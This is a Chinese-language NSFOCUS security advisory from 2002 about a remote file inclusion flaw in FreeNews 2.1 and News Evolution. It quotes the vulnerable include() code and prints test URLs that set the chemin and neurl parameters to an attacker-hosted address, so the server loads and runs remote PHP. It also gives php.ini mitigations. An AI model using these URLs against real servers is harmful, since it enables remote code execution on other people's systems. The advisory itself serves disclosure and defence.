首页 -> 安全研究

安全研究

安全漏洞
FreeNews包含未定义变量远程命令执行漏洞

发布日期:2002-11-26
更新日期:2002-12-03

受影响系统:
FreeNews FreeNews 2.1
描述:
BUGTRAQ  ID: 6258

Freenews和NewsEvolution是两款类似的开放源代码新闻发布系统。

Freenews和NewsEvolution包含的脚本对用户提交的输入缺少正确检查,远程攻击者可以利用这个漏洞包含远程服务器上的任意文件,导致文件中的代码以WEB进程权限在服务器上执行。

freenews 2.1中的aff_news.php包含如下代码:

include ("$chemin/config.php");  
include ("$chemin/options.inc.php");  
include ("$chemin/freenews_functions.inc.php");

变量$chemin在这些文件中没有定义,因此攻击者可以定义为远程服务器上的任意文件,如果远程文件包含恶意PHP脚本,可导致脚本以WEB权限在系统上执行。

News Evolution 1.0中的aff_news.php脚本,和News Evolution 2.0中的screen.php也存在上面所描述的问题,可导致远程攻击者以WEB进程权限在系统上执行任意指令。

<*来源:Frog Man
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=103825361930536&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Frog Man 提供了如下测试方法:

a) freenews 2.1
http://[target]/aff_news.php?chemin=http://[attacker]
with
http://[attacker]/config.php
http://[attacker]/options.inc.php
http://[attacker]/freenews_functions.inc.php
...

b) News Evolution 1.0
http://[target]/aff_news.php?chemin=http://[attacker]/
with
http://[attacker]/config.php
http://[attacker]/functions.inc.php
http://[attacker]/options.inc.php
...

c) News Evolution 2.0
http://[target]/screen.php?neurl=http://[attacker]
with :
http://[attacker]/admin/cfg/configsql.inc.php
http://[attacker]/admin/cfg/configscreen.inc.php
http://[attacker]/admin/cfg/configsite.inc.php
http://[attacker]/admin/cfg/configtache.inc.php
http://[attacker]/admin/fonctions/fctscr.php
http://[attacker]/admin/fonctions/fctadmin.php
http://[attacker]/admin/fonctions/fctform.php
http://[attacker]/admin/modules/cache.php

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 在php.ini配置文件中设置'allow_url_fopen'和'register_globals'为'off'。

厂商补丁:

FreeNews
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.prologin.fr

http://www.phpevolution.net

浏览次数:2721
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障